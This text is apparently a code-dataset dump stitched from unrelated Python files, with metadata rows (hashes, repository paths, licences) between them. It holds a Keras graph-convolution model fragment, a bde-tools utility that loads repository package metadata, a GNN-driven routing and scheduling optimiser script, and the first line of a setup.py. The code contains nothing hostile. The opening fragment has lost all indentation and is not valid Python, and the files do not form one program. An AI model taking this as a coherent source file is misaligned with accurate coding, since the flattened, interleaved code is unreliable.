if self.use_sparse:
A_indices, A_values = As
Ainput = [
SqueezedSparseConversion(shape=(n_nodes, n_nodes))(
[A_indices, A_values]
)
]
# Otherwise, create dense matrix from input tensor
else:
Ainput = [Lambda(lambda A: K.squeeze(A, 0))(A) for A in As]
# TODO: Support multiple matrices?
if len(Ainput) != 1:
raise NotImplementedError(
"The GCN method currently only accepts a single matrix"
)
h_layer = x_in
for layer in self._layers:
if isinstance(layer, GraphConvolution):
# For a GCN layer add the matrix and output indices
# Note that the output indices are only used if `final_layer=True`
h_layer = layer([h_layer, out_indices] + Ainput)
else:
# For other (non-graph) layers only supply the input tensor
h_layer = layer(h_layer)
# print("Hlayer:", h_layer)
return h_layer
def node_model(self):
"""
Builds a GCN model for node prediction
Returns:
tuple: `(x_inp, x_out)`, where `x_inp` is a list of two Keras input tensors for the GCN model (containing node features and graph laplacian),
and `x_out` is a Keras tensor for the GCN model output.
"""
# Placeholder for node features
N_nodes = self.generator.features.shape[0]
N_feat = self.generator.features.shape[1]
# Inputs for features & target indices
x_t = Input(batch_shape=(1, N_nodes, N_feat))
out_indices_t = Input(batch_shape=(1, None), dtype="int32")
# Create inputs for sparse or dense matrices
if self.use_sparse:
# Placeholders for the sparse adjacency matrix
A_indices_t = Input(batch_shape=(1, None, 2), dtype="int64")
A_values_t = Input(batch_shape=(1, None))
A_placeholders = [A_indices_t, A_values_t]
else:
# Placeholders for the dense adjacency matrix
A_m = Input(batch_shape=(1, N_nodes, N_nodes))
A_placeholders = [A_m]
# TODO: Support multiple matrices
x_inp = [x_t, out_indices_t] + A_placeholders
x_out = self(x_inp)
# Flatten output by removing singleton batch dimension
if x_out.shape[0] == 1:
self.x_out_flat = Lambda(lambda x: K.squeeze(x, 0))(x_out)
else:
self.x_out_flat = x_out
return x_inp, x_out
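# Illustrative usage sketch (not part of the library code): how the tensors
# returned by node_model() are typically wired into a Keras model. "G",
# "n_classes", "train_nodes" and "train_targets" are assumed to exist in the
# caller's scope, and "Model" is assumed to be available via the wildcard import.
#
#   generator = FullBatchNodeGenerator(G, method="gcn")
#   gcn = GCN(layer_sizes=[16, n_classes], activations=["relu", "softmax"],
#             generator=generator, dropout=0.5)
#   x_inp, x_out = gcn.node_model()
#   model = Model(inputs=x_inp, outputs=x_out)
#   model.compile(optimizer="adam", loss="categorical_crossentropy")
#   model.fit(generator.flow(train_nodes, train_targets), epochs=20)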
| 37.56
| 153
| 0.628579
|
cddc2ce7e577c6022b47652dc49aa070f8a41897
| 12,539
|
py
|
Python
|
lib/python/bdebuild/meta/repoloadutil.py
|
apaprocki/bde-tools
|
74cee6ed6c2de1bbb0d7cb7fdc96b60a37cab434
|
[
"Apache-2.0"
] | null | null | null |
lib/python/bdebuild/meta/repoloadutil.py
|
apaprocki/bde-tools
|
74cee6ed6c2de1bbb0d7cb7fdc96b60a37cab434
|
[
"Apache-2.0"
] | null | null | null |
lib/python/bdebuild/meta/repoloadutil.py
|
apaprocki/bde-tools
|
74cee6ed6c2de1bbb0d7cb7fdc96b60a37cab434
|
[
"Apache-2.0"
] | null | null | null |
"""Utilities to load parts of a repository.
"""
import glob
import os
import re
from bdebuild.common import blderror
from bdebuild.common import sysutil
from bdebuild.meta import repounits
from bdebuild.meta import optionsparser
def load_package_group(path):
"""Load a package group.
Args:
path (str): Path to the root of the package group.
Returns:
PackageGroup
"""
package_group = repounits.PackageGroup(path)
package_group.mem = set(_load_lsv(
os.path.join(package_group.path, 'group',
package_group.name + '.mem')))
package_group.dep = set(_load_lsv(
os.path.join(package_group.path, 'group',
package_group.name + '.dep')))
package_group.opts = _load_opts(os.path.join(package_group.path, 'group',
package_group.name + '.opts'))
package_group.defs = _load_opts(os.path.join(package_group.path, 'group',
package_group.name + '.defs'))
package_group.cap = _load_opts(os.path.join(package_group.path, 'group',
package_group.name + '.cap'))
return package_group
def load_package(path, package_type):
"""Load a package.
Args:
path (str): Path to the root of the package.
        package_type (PackageType): The package type.
    Returns:
        Package
"""
package = repounits.Package(path, package_type)
package.mem = set(_load_lsv(
os.path.join(package.path, 'package',
package.name + '.mem')))
package.dep = set(_load_lsv(
os.path.join(package.path, 'package',
package.name + '.dep')))
package.opts = _load_opts(os.path.join(package.path, 'package',
package.name + '.opts'))
package.defs = _load_opts(os.path.join(package.path, 'package',
package.name + '.defs'))
package.cap = _load_opts(os.path.join(package.path, 'package',
package.name + '.cap'))
dums_path = os.path.join(package.path, 'package', package.name + '.dums')
package.has_dums = os.path.isfile(dums_path)
# We need to distinguish between the case when the pub file does not exist
# and the case when the pub file exist but is empty. If the pub file does
# not exist, then every header file should be exported; if the pub file
# does exist but is empty, then no header file should be exported.
pub_path = os.path.join(package.path, 'package', package.name + '.pub')
if os.path.isfile(pub_path):
package.pub = set(_load_lsv(pub_path))
else:
package.pub = None
if package.type_ == repounits.PackageType.PACKAGE_PLUS:
package.pt_extras = _load_plus_package_extras(package)
else:
if package.type_ == repounits.PackageType.PACKAGE_APPLICATION:
main_ext = '.m.cpp'
valid_prefixes = [package.name]
if package.name.startswith('m_'):
valid_prefixes.append(package.name[2:])
for prefix in valid_prefixes:
main_path = os.path.join(package.path, prefix + main_ext)
if os.path.isfile(main_path):
package.app_main = prefix
break
if not package.app_main:
raise blderror.MissingFileError(
'Missing source file "%s" for '
'application package "%s"' %
(os.path.join(package.path, package.name + main_ext),
package.name))
for component_name in sorted(package.mem):
component = load_component(component_name, package.path)
package.components.append(component)
return package
def _load_plus_package_extras(package):
"""Load metadata of a "+" package.
Args:
package (Package): The plus package.
Returns:
PlusPackageExtras
"""
def rps(l):
return set([os.path.relpath(path, package.path) for path in l])
extras = repounits.PlusPackageExtras()
if package.pub is None: # pub file does not exist
headers = glob.glob(os.path.join(package.path, '*.h'))
headers.extend(glob.glob(os.path.join(package.path, '*.SUNWCCh')))
headers.extend(glob.glob(os.path.join(package.path, '*/*.h')))
        headers.extend(glob.glob(os.path.join(package.path, '*/*.SUNWCCh')))
        extras.headers = rps(headers)
elif len(package.pub) > 0:
extras.headers = package.pub
else: # pub file is empty
extras.headers = []
extras.cpp_sources = rps(glob.glob(os.path.join(package.path, '*.cpp')))
extras.cpp_tests = rps(glob.glob(os.path.join(package.path,
'test', '*.cpp')))
extras.c_tests = rps(glob.glob(os.path.join(package.path, 'test', '*.c')))
return extras
def load_component(name, package_path):
"""Load a component.
Args:
name (str): The name of the component.
package_path (str): The path to the package containing the component.
Returns:
        Component
"""
component = repounits.Component(name)
base_path = os.path.join(package_path, component.name)
header_path = base_path + '.h'
cxx_path = base_path + '.cpp'
c_path = base_path + '.c'
if not os.path.isfile(header_path):
raise blderror.MissingFileError(
'Missing header file "%s"' % header_path)
if os.path.isfile(cxx_path):
component.type_ = repounits.ComponentType.CXX
test_path = base_path + '.t.cpp'
elif os.path.isfile(c_path):
component.type_ = repounits.ComponentType.C
test_path = base_path + '.t.c'
else:
raise blderror.MissingFileError(
'Missing source (cpp) file for header file "%s"' % header_path)
component.has_test_driver = os.path.isfile(test_path)
return component
def is_package_group_path(path):
"""Determine whether a path is the root of a package group.
"""
group_name = os.path.basename(path)
return os.path.isfile(os.path.join(path, 'group', group_name + '.mem'))
def is_package_path(path):
"""Determine whether a path is the root of a package.
"""
package_name = os.path.basename(path)
return os.path.isfile(os.path.join(path, 'package', package_name + '.mem'))
def is_third_party_path(path):
"""Determine whether a path is the root of a third party directory.
"""
return os.path.isfile(os.path.join(path, 'wscript'))
def is_bde_repo_path(path):
"""Determine whether a path is the root of a BDE-style repo.
"""
basename = os.path.basename(path)
    return not basename.startswith('_') and basename not in ('build',)
def _load_opts(path):
"""Load option rules from a file.
"""
if os.path.isfile(path):
return optionsparser.parse_option_rules_file(path)
else:
return []
REMOVE_COMMENT_RE = re.compile(r'^([^#]*)(#.*)?$')
def _load_lsv(path):
"""Load values from line separated file.
Return a list containing the contents of the line separated file from the
specified path. If the path does not exist, return an empty list.
"""
try:
with open(path) as f:
lines = f.readlines()
except IOError:
return []
entries = []
for line in lines:
line = line.rstrip('\n')
# Lines after "#LEGACY" are ignored and used for compatibility with
# other internal legacy tools.
if line == '#LEGACY':
break
entries.extend(REMOVE_COMMENT_RE.match(line).group(1).split())
return entries
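# Illustrative sketch of the line-separated format consumed by _load_lsv
# (hypothetical file contents; the component names are made up):
#
#   bdlt_date          # trailing comments after '#' are stripped
#   bdlt_datetime
#   #LEGACY
#   old_component      <- ignored: everything after the '#LEGACY' marker is skipped
#
# For such a file, _load_lsv(path) returns ['bdlt_date', 'bdlt_datetime'];
# a missing file yields an empty list.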
def get_uor_doc(uor):
"""Parse the mnemonic and description of a UOR from its doc file.
Args:
uor (Package or PackageGroup): The unit of release.
Returns:
UorDoc
"""
name = uor.name
doc_path = os.path.join(uor.path, 'doc', name + '.txt')
try:
with open(doc_path) as f:
purpose = None
mnemonic = None
for line in f:
if line.startswith('@PURPOSE'):
purpose = line.split(':')[1].strip()
elif line.startswith('@MNEMONIC'):
mnemonic = line.split(':')[1].strip()
if purpose and mnemonic:
return repounits.UorDoc(mnemonic, purpose)
except:
pass
return repounits.UorDoc(name, 'N/A')
UOR_VERSIONS_CACHE = {}
def get_uor_version(uor, uors_map):
"""Try to get the version number of a UOR.
Args:
uor (Package or PackageGroup): The unit of release.
uors_map (dict of str to uor): Map of name to uors in the repo.
Returns:
UorVersion
"""
def _is_valid(version):
return (sysutil.is_int_string(version.major) and
sysutil.is_int_string(version.minor) and
sysutil.is_int_string(version.patch))
global UOR_VERSIONS_CACHE
if uor.name in UOR_VERSIONS_CACHE:
return UOR_VERSIONS_CACHE[uor.name]
try:
version = _get_uor_version_impl(uor)
if _is_valid(version):
UOR_VERSIONS_CACHE[uor.name] = version
return version
except:
UOR_VERSIONS_CACHE[uor.name] = None
return None
ref_name = version.major.split('_')[0].lower()
if uor.name != ref_name:
if ref_name not in UOR_VERSIONS_CACHE:
ref_version = _get_uor_version_impl(uors_map[ref_name])
ref_version = ref_version if _is_valid(ref_version) else None
UOR_VERSIONS_CACHE[ref_name] = ref_version
version = UOR_VERSIONS_CACHE[ref_name]
else:
version = None
UOR_VERSIONS_CACHE[uor.name] = version
return version
def _get_uor_version_impl(uor):
is_group = getattr(uor, 'components', None) is None
if is_group:
scm_path = os.path.join(uor.path, '%sscm' % uor.name)
versiontag_path = os.path.join(scm_path,
'%sscm_versiontag.h' % uor.name)
if uor.name in ('bde', 'bsl', 'hsl'):
version_path = os.path.join(scm_path,
'%sscm_patchversion.h' % uor.name)
else:
version_path = os.path.join(scm_path,
'%sscm_version.cpp' % uor.name)
else:
versiontag_path = os.path.join(uor.path, '%s_versiontag.h' % uor.name)
version_path = os.path.join(uor.path, '%s_version.cpp' % uor.name)
with open(versiontag_path) as f:
versiontag_source = f.read()
with open(version_path) as f:
version_source = f.read()
major_ver_re = re.compile(
r'''^\s*#define\s+%s_VERSION_MAJOR\s+(\S+)\s*$''' %
uor.name.upper(), re.MULTILINE)
minor_ver_re = \
re.compile(r'''^\s*#define\s+%s_VERSION_MINOR\s+(\S+)\s*$''' %
uor.name.upper(), re.MULTILINE)
if uor.name in ('bde', 'bsl'):
patch_ver_re = re.compile(
r'''^\s*#define\s+%sSCM_PATCHVERSION_PATCH\s+(\S+)\s*$''' %
uor.name.upper(), re.MULTILINE)
else:
patch_ver_re = re.compile(
r'''^\s*#define\s+%s_VERSION_PATCH\s+(\S+)\s*$''' %
uor.name.upper(), re.MULTILINE)
major_ver = None
minor_ver = None
patch_ver = None
m = major_ver_re.search(versiontag_source)
if m:
major_ver = m.group(1)
m = minor_ver_re.search(versiontag_source)
if m:
minor_ver = m.group(1)
m = patch_ver_re.search(version_source)
if m:
patch_ver = m.group(1)
return repounits.UorVersion(major_ver, minor_ver, patch_ver)
# -----------------------------------------------------------------------------
# Copyright 2015 Bloomberg Finance L.P.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ----------------------------- END-OF-FILE -----------------------------------
| 32.233933
| 79
| 0.598134
|
e42da0476c04e07a9fc4695b0b963b02986af08d
| 18,835
|
py
|
Python
|
code/optimizer/optimize_scheduling_routing.py
|
MiquelFerriol/TwinNet
|
6b627cd6e2f6bedd7cdbec790a96b19cd634ff69
|
[
"Apache-2.0"
] | null | null | null |
code/optimizer/optimize_scheduling_routing.py
|
MiquelFerriol/TwinNet
|
6b627cd6e2f6bedd7cdbec790a96b19cd634ff69
|
[
"Apache-2.0"
] | null | null | null |
code/optimizer/optimize_scheduling_routing.py
|
MiquelFerriol/TwinNet
|
6b627cd6e2f6bedd7cdbec790a96b19cd634ff69
|
[
"Apache-2.0"
] | null | null | null |
"""
Copyright 2021 Universitat Politècnica de Catalunya
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
import networkx as nx
import configparser
import numpy as np
import random
import tensorflow as tf
from statistics import mean
import os
import pickle
import sys
sys.path.insert(1, "../code/GNN/")
from model import model_fn
os.environ['TF_CPP_MIN_LOG_LEVEL'] = '3'
CONFIG = configparser.ConfigParser()
CONFIG._interpolation = configparser.ExtendedInterpolation()
CONFIG.read('../code/GNN/config.ini')
SLA = [0.6, 1]
POLICIES = np.array(['WFQ', 'SP', 'DRR', 'FIFO'])
MAX_NUM_QUEUES = 5
with open('./optimizer/SAMPLE_FIFO_TOS_ROUTING.pkl', 'rb') as f:
sample = pickle.load(f)
def transformation(x, y):
traffic_mean = 661.045
traffic_sdv = 419.19
packets_mean = 0.661
packets_sdv = 0.419
capacity_mean = 25495.603
capacity_sdv = 16228.992
x["traffic"] = (x["traffic"] - traffic_mean) / traffic_sdv
x["packets"] = (x["packets"] - packets_mean) / packets_sdv
x["capacity"] = (x["capacity"] - capacity_mean) / capacity_sdv
y = tf.math.log(y)
return x, y
def sample_to_dependency_graph(sample, intensity, R=None):
G = nx.DiGraph(sample.get_topology_object())
if R is None:
R = sample.get_routing_matrix()
T = sample.get_traffic_matrix()
P = sample.get_performance_matrix()
D_G = nx.DiGraph()
for src in range(G.number_of_nodes()):
for dst in range(G.number_of_nodes()):
if src != dst:
D_G.add_node('p_{}_{}'.format(src, dst),
traffic=(T[src, dst]['Flows'][0]['AvgBw'] / sample.maxAvgLambda) * intensity,
packets=(T[src, dst]['Flows'][0]['PktsGen'] / sample.maxAvgLambda) * intensity,
#traffic=T[src, dst]['Flows'][0]['AvgBw'],
#packets=T[src, dst]['Flows'][0]['PktsGen'],
tos=int(T[src, dst]['Flows'][0]['ToS']),
source=src,
destination=dst,
delay=float(P[src, dst]['AggInfo']['AvgDelay']))
if G.has_edge(src, dst):
D_G.add_node('l_{}_{}'.format(src, dst),
capacity=G.edges[src, dst]['bandwidth'],
policy=np.where(G.nodes[src]['schedulingPolicy'] == POLICIES)[0][0])
for h_1, h_2 in [R[src, dst][i:i + 2] for i in range(0, len(R[src, dst]) - 1)]:
D_G.add_edge('p_{}_{}'.format(src, dst), 'l_{}_{}'.format(h_1, h_2))
q_s = str(G.nodes[h_1]['queueSizes']).split(',')
# policy = G.nodes[h_1]['schedulingPolicy']
if 'schedulingWeights' in G.nodes[h_1]:
q_w = str(G.nodes[h_1]['schedulingWeights']).split(',')
else:
q_w = ['-']
if 'tosToQoSqueue' in G.nodes[h_1]:
map = [m.split(',') for m in str(G.nodes[h_1]['tosToQoSqueue']).split(';')]
else:
map = [[1], [2], [3]]
q_n = 0
for q in range(G.nodes[h_1]['levelsQoS']):
D_G.add_node('q_{}_{}_{}'.format(h_1, h_2, q),
size=int(q_s[q]),
priority=q_n,
weight=float(q_w[q]) if q_w[0] != '-' else 0)
D_G.add_edge('l_{}_{}'.format(h_1, h_2), 'q_{}_{}_{}'.format(h_1, h_2, q))
if str(int(T[src, dst]['Flows'][0]['ToS'])) in map[q]:
D_G.add_edge('p_{}_{}'.format(src, dst), 'q_{}_{}_{}'.format(h_1, h_2, q))
D_G.add_edge('q_{}_{}_{}'.format(h_1, h_2, q), 'p_{}_{}'.format(src, dst))
q_n += 1
D_G.remove_nodes_from([node for node, out_degree in D_G.out_degree() if out_degree == 0])
n_q = 0
n_p = 0
n_l = 0
mapping = {}
for entity in list(D_G.nodes()):
if entity.startswith('q'):
mapping[entity] = ('q_{}'.format(n_q))
n_q += 1
elif entity.startswith('p'):
mapping[entity] = ('p_{}'.format(n_p))
n_p += 1
elif entity.startswith('l'):
mapping[entity] = ('l_{}'.format(n_l))
n_l += 1
D_G = nx.relabel_nodes(D_G, mapping)
return D_G, n_q, n_p, n_l
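# Note on the naming convention used above: 'p_<src>_<dst>' nodes are paths,
# 'l_<src>_<dst>' nodes are links and 'q_<src>_<dst>_<q>' nodes are queues; the
# final relabelling collapses them to 'p_<i>', 'l_<i>' and 'q_<i>' with dense
# integer ids, which is what the generator below indexes on.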
def generator(sample, intensity, comb_routing, comb_scheduling):
it = 0
for routing in comb_routing:
        D_G, n_q, n_p, n_l = sample_to_dependency_graph(sample, intensity, routing)
link_to_path = np.array([], dtype='int32')
queue_to_path = np.array([], dtype='int32')
l_p_s = np.array([], dtype='int32')
l_q_p = np.array([], dtype='int32')
path_ids = np.array([], dtype='int32')
for i in range(n_p):
l_s_l = 0
q_s_l = 0
for elem in D_G['p_{}'.format(i)]:
if elem.startswith('l_'):
link_to_path = np.append(link_to_path, int(elem.replace('l_', '')))
l_s_l += 1
elif elem.startswith('q_'):
queue_to_path = np.append(queue_to_path, int(elem.replace('q_', '')))
q_s_l += 1
path_ids = np.append(path_ids, [i] * q_s_l)
l_p_s = np.append(l_p_s, range(l_s_l))
l_q_p = np.append(l_q_p, range(q_s_l))
path_to_queue = np.array([], dtype='int32')
sequence_queues = np.array([], dtype='int32')
for i in range(n_q):
seq_len = 0
for elem in D_G['q_{}'.format(i)]:
path_to_queue = np.append(path_to_queue, int(elem.replace('p_', '')))
seq_len += 1
sequence_queues = np.append(sequence_queues, [i] * seq_len)
queue_to_link = np.array([], dtype='int32')
sequence_links = np.array([], dtype='int32')
l_q_l = np.array([], dtype='int32')
for i in range(n_l):
seq_len = 0
for elem in D_G['l_{}'.format(i)]:
queue_to_link = np.append(queue_to_link, int(elem.replace('q_', '')))
seq_len += 1
sequence_links = np.append(sequence_links, [i] * seq_len)
l_q_l = np.append(l_q_l, range(seq_len))
if -1 in list(nx.get_node_attributes(D_G, 'delay').values()):
continue
if it % 500 == 0:
print("GENERATED SAMPLE: {}".format(it))
it += 1
yield {"traffic": list(nx.get_node_attributes(D_G, 'traffic').values()),
"packets": list(nx.get_node_attributes(D_G, 'packets').values()),
"capacity": list(nx.get_node_attributes(D_G, 'capacity').values()),
"size": list(nx.get_node_attributes(D_G, 'size').values()),
"policy": list(nx.get_node_attributes(D_G, 'policy').values()),
"priority": list(nx.get_node_attributes(D_G, 'priority').values()),
"weight": list(nx.get_node_attributes(D_G, 'weight').values()),
"link_to_path": link_to_path,
"queue_to_path": queue_to_path,
"path_to_queue": path_to_queue,
"queue_to_link": queue_to_link,
"sequence_queues": sequence_queues,
"sequence_links": sequence_links,
"path_ids": path_ids,
"l_p_s": l_p_s,
"l_q_p": l_q_p,
"l_q_l": l_q_l,
"n_queues": n_q,
"n_links": n_l,
"n_paths": n_p,
}, list(nx.get_node_attributes(D_G, 'delay').values())
def input_fn(sample, intensity, comb_routing, comb_scheduling, transform=True, repeat=True, take=None):
ds = tf.data.Dataset.from_generator(
        lambda: generator(sample=sample, intensity=intensity, comb_routing=comb_routing,
comb_scheduling=comb_scheduling),
({"traffic": tf.float32, "packets": tf.float32,
"capacity": tf.float32,
"size": tf.float32, "policy": tf.int32,
"priority": tf.int32,
"weight": tf.float32, "link_to_path": tf.int32,
"queue_to_path": tf.int32, "path_to_queue": tf.int32,
"queue_to_link": tf.int32, "sequence_queues": tf.int32,
"sequence_links": tf.int32, "path_ids": tf.int32,
"l_p_s": tf.int32, "l_q_p": tf.int32,
"l_q_l": tf.int32,
"n_queues": tf.int32, "n_links": tf.int32,
"n_paths": tf.int32},
tf.float32),
({"traffic": tf.TensorShape([None]), "packets": tf.TensorShape([None]),
"capacity": tf.TensorShape([None]),
"size": tf.TensorShape([None]), "policy": tf.TensorShape([None]),
"priority": tf.TensorShape([None]),
"weight": tf.TensorShape([None]), "link_to_path": tf.TensorShape([None]),
"queue_to_path": tf.TensorShape([None]), "path_to_queue": tf.TensorShape([None]),
"queue_to_link": tf.TensorShape([None]), "sequence_queues": tf.TensorShape([None]),
"sequence_links": tf.TensorShape([None]), "path_ids": tf.TensorShape([None]),
"l_p_s": tf.TensorShape([None]), "l_q_p": tf.TensorShape([None]),
"l_q_l": tf.TensorShape([None]),
"n_queues": tf.TensorShape([]), "n_links": tf.TensorShape([]),
"n_paths": tf.TensorShape([])},
tf.TensorShape([None])))
if transform:
ds = ds.map(lambda x, y: transformation(x, y))
if repeat:
ds = ds.repeat()
if take:
ds = ds.take(take)
ds = ds.prefetch(tf.data.experimental.AUTOTUNE)
return ds
def evaluate_solution(D_G, pred_delays):
sat_tos = [[] for _ in range(int(CONFIG['DATASET']['num_tos']))]
no_sat_tos = [[] for _ in range(int(CONFIG['DATASET']['num_tos']))]
best_effort = []
delays = [[] for _ in range(int(CONFIG['DATASET']['num_tos']))]
id = 0
for node, data in D_G.nodes(data=True):
if node.startswith('p_'):
if data['tos'] < len(sat_tos) - 1:
# D_G.nodes[node]['predicted_delay'] = delays[id]
if pred_delays[id] <= SLA[data['tos']]:
# D_G.nodes[node]['sla'] = True
sat_tos[data['tos']].append(node)
else:
# D_G.nodes[node]['sla'] = False
no_sat_tos[data['tos']].append(node)
delays[data['tos']].append(pred_delays[id])
else:
delays[2].append(pred_delays[id])
best_effort.append(node)
id += 1
for it in range(len(best_effort)):
if mean(delays[2]) < delays[2][it]:
no_sat_tos[2].append(best_effort[it])
else:
sat_tos[2].append(best_effort[it])
return sat_tos, no_sat_tos, delays
def compute_mean(a):
means = []
for elem in a:
means.append(mean(elem))
return mean(means)
def k_shortest_paths(G, source, target, k, weight=None):
paths = []
leng = -1
for path in nx.shortest_simple_paths(G, source, target, weight=weight):
if leng == -1:
leng = len(path)
if len(path) == leng or len(path) <= leng + k:
paths.append(path)
elif len(path) > leng + k:
return paths
return paths
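# Minimal sketch of k_shortest_paths on a toy graph (illustrative only, not part
# of the optimisation run below):
#
#   g = nx.cycle_graph(4)            # nodes 0-1-2-3 arranged in a ring
#   k_shortest_paths(g, 0, 2, 1)     # -> [[0, 1, 2], [0, 3, 2]] (order may vary)
#
# Note that k bounds how many nodes longer than the shortest path a candidate
# may be, rather than the number of paths returned.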
MODEL_DIR = './logs/all_queues'
estimator = tf.estimator.Estimator(
model_fn=model_fn,
model_dir=MODEL_DIR,
params=CONFIG
)
NO_SOL_IT = 3
COMB_PER_ITERATION = 1000
MAX_SAMPLES = 5000
df_to_concat = []
# list(range(1900, 900, -100))
for intensity in list(range(1800, 900, -100)):
with open('./optimizer/SAMPLE_WFQ_TOS_ROUTING.pkl', 'rb') as f:
sample = pickle.load(f)
with open('./optimizer/scheduling/scheduling_{}.pkl'.format(intensity), 'rb') as f:
G = pickle.load(f)
with open('./optimizer/routing/routing_{}.pkl'.format(intensity), 'rb') as f:
R = pickle.load(f)
sample._set_routing_matrix(R)
sample._set_topology_object(G)
K = 1
G = nx.DiGraph(sample.get_topology_object())
R = sample.get_routing_matrix()
routing = np.copy(R)
P = np.zeros((len(G), len(G)), dtype='object')
D_G, n_q, n_p, n_l = sample_to_dependency_graph(sample, intensity)
comb_routing = [routing]
pred_results = estimator.predict(input_fn=lambda: input_fn(
sample,
intensity,
comb_routing,
None,
transform=True,
repeat=False))
pred_delay = np.exp([pred['predictions'] for pred in pred_results])
"""print(sample.maxAvgLambda)
print(mean(np.abs(list(nx.get_node_attributes(D_G, 'delay').values()) - pred_delay) / list(
nx.get_node_attributes(D_G, 'delay').values())))"""
len(pred_delay)
len(list(nx.get_node_attributes(D_G, 'delay').values()))
sat_tos, no_sat_tos, delays = evaluate_solution(D_G, pred_delay)
ini_sat_tos = sat_tos.copy()
ini_no_sat_tos = no_sat_tos.copy()
ini_delays = delays.copy()
len(ini_no_sat_tos[0])
len(ini_no_sat_tos[1])
print("INITIAL SOLUTION")
print("SATISFIED SLA 0: {}".format(len(ini_sat_tos[0])))
print("SATISFIED SLA 1: {}".format(len(ini_sat_tos[1])))
print("MEAN DELAY BEST EFFORT: {}".format(mean(ini_delays[2])))
max_delay = compute_mean(delays)
worst_routing = None
for src in G.nodes():
for dst in G.nodes():
P[src][dst] = k_shortest_paths(G, src, dst, K)
it = 0
it_no_sol = 0
while True:
if it_no_sol == NO_SOL_IT:
break
print("ITERATION {}".format(it))
print("{} NOT SATISFYING SLA 0: {}".format(len(no_sat_tos[0]), no_sat_tos[0]))
print("{} NOT SATISFYING SLA 1: {}".format(len(no_sat_tos[1]), no_sat_tos[1]))
comb_routing = []
change = None
if len(no_sat_tos[0]) != 0:
print("ITERATING OVER TOS = 0")
reward = no_sat_tos[0] + random.sample(no_sat_tos[1], int(len(no_sat_tos[1]) / 5))
penalize = random.sample(sat_tos[0], int(len(sat_tos[0]) / 5)) + random.sample(sat_tos[1], int(
len(sat_tos[1]) / 5)) + random.sample(sat_tos[2],
int(len(sat_tos[1]) / 10))
elif len(no_sat_tos[1]) != 0:
print("ITERATING OVER TOS = 1")
reward = no_sat_tos[1]
penalize = random.sample(sat_tos[2], int(len(sat_tos[1]) / 5))
else:
print("ITERATING OVER BEST EFFORT")
reward = no_sat_tos[2]
penalize = sat_tos[0] + sat_tos[1]
if it_no_sol >= 2:
print("NO SOLUTION FOUND DURING {} ITERATIONS. STARTING PENALIZING...".format(it_no_sol))
for _ in range(COMB_PER_ITERATION):
R_aux = np.copy(routing)
for path in reward:
src = D_G.nodes[path]['source']
dst = D_G.nodes[path]['destination']
# print("CHANGING SRC: {} DST: {}".format(src,dst))
R_aux[src, dst] = random.choice(P[src, dst])
if it_no_sol >= 2:
for path in penalize:
src = D_G.nodes[path]['source']
dst = D_G.nodes[path]['destination']
# print("CHANGING SRC: {} DST: {}".format(src,dst))
R_aux[src, dst] = random.choice(P[src, dst])
comb_routing.append(R_aux)
pred_results = estimator.predict(input_fn=lambda: input_fn(
sample,
intensity,
comb_routing,
None,
transform=True,
repeat=False))
pred_delay = np.exp([pred['predictions'] for pred in pred_results])
splited_delay = np.array_split(pred_delay, COMB_PER_ITERATION)
it_no_sol += 1
for i in range(len(splited_delay)):
s_sat_tos, s_no_sat_tos, s_delays = evaluate_solution(D_G, splited_delay[i])
if len(s_no_sat_tos[0]) < len(no_sat_tos[0]):
print("FOUND BETTER SOLUTION 1: BEFORE {} AFTER {}".format(len(sat_tos[0]), len(s_sat_tos[0])))
sat_tos = s_sat_tos
no_sat_tos = s_no_sat_tos
delays = s_delays
routing = np.copy(comb_routing[i])
it_no_sol = 0
elif (len(s_no_sat_tos[0]) == len(no_sat_tos[0])) and (len(s_no_sat_tos[1]) < len(no_sat_tos[1])):
print("FOUND BETTER SOLUTION 2: BEFORE {} AFTER {}".format(len(sat_tos[1]), len(s_sat_tos[1])))
sat_tos = s_sat_tos
no_sat_tos = s_no_sat_tos
delays = s_delays
routing = np.copy(comb_routing[i])
it_no_sol = 0
elif (len(s_no_sat_tos[0]) == len(no_sat_tos[0])) and (len(s_no_sat_tos[1]) == len(no_sat_tos[1])) and (
mean(s_delays[2]) < mean(delays[2])):
print("FOUND BETTER SOLUTION 3: BEFORE {} AFTER {}".format(mean(delays[2]), mean(s_delays[2])))
sat_tos = s_sat_tos
no_sat_tos = s_no_sat_tos
delays = s_delays
routing = np.copy(comb_routing[i])
it_no_sol = 0
print("CURRENT SOLUTION")
print("SATISFIED SLA 0: {}".format(len(sat_tos[0])))
print("SATISFIED SLA 1: {}".format(len(sat_tos[1])))
print("MEAN DELAY BEST EFFORT: {}".format(mean(delays[2])))
it += 1
print("INITIAL SOLUTION FOUND")
print("SATISFIED SLA 0: {}".format(len(ini_sat_tos[0])))
print("SATISFIED SLA 1: {}".format(len(ini_sat_tos[1])))
print("MEAN DELAY BEST EFFORT: {}".format(mean(ini_delays[2])))
print("BEST SOLUTION FOUND FOR INTENSITY {}".format(intensity))
print("SATISFIED SLA 0: {}".format(len(sat_tos[0])))
print("SATISFIED SLA 1: {}".format(len(sat_tos[1])))
print("MEAN DELAY BEST EFFORT: {}".format(mean(delays[2])))
with open('./optimizer/scheduling_routing/routing_{}.pkl'.format(intensity), 'wb') as f:
pickle.dump(routing, f, pickle.HIGHEST_PROTOCOL)
with open('./optimizer/scheduling_routing/delays_{}.pkl'.format(intensity), 'wb') as f:
pickle.dump(delays, f, pickle.HIGHEST_PROTOCOL)
| 40.074468
| 116
| 0.554765
|
744ee3be090d9ec1b30307fcb2162d1792b1a5af
| 1,857
|
py
|
Python
|
setup.py
|
SocioDroid/django-excel-response
|
8aef53162b79b0b951eca73f642f5d6d0f29507c
|
[
"Apache-2.0"
] | null | null | null |
setup.py
|
SocioDroid/django-excel-response
|
8aef53162b79b0b951eca73f642f5d6d0f29507c
|
[
"Apache-2.0"
] | null | null | null |
setup.py
|
SocioDroid/django-excel-response
|
8aef53162b79b0b951eca73f642f5d6d0f29507c
|
[
"Apache-2.0"
] | null | null | null |
import os
